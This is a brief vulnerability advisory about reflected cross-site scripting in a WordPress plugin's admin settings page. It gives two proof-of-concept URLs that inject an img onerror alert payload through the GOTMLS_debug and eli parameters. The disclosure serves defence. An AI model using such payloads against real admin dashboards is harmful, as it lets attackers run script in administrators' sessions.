The plugin does not sanitise and escape some parameters before outputting them back in an admin dashboard, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS;_debug=<%2Fscript><img+src+onerror%3Dalert(1)%3B> Also possible with the $_GET[‘eli’] parameter: http://example.com/wp-admin/admin.php?page=GOTMLS-settings&eli;=<%2Fscript><img+src+onerror%3Dalert(1)%3B>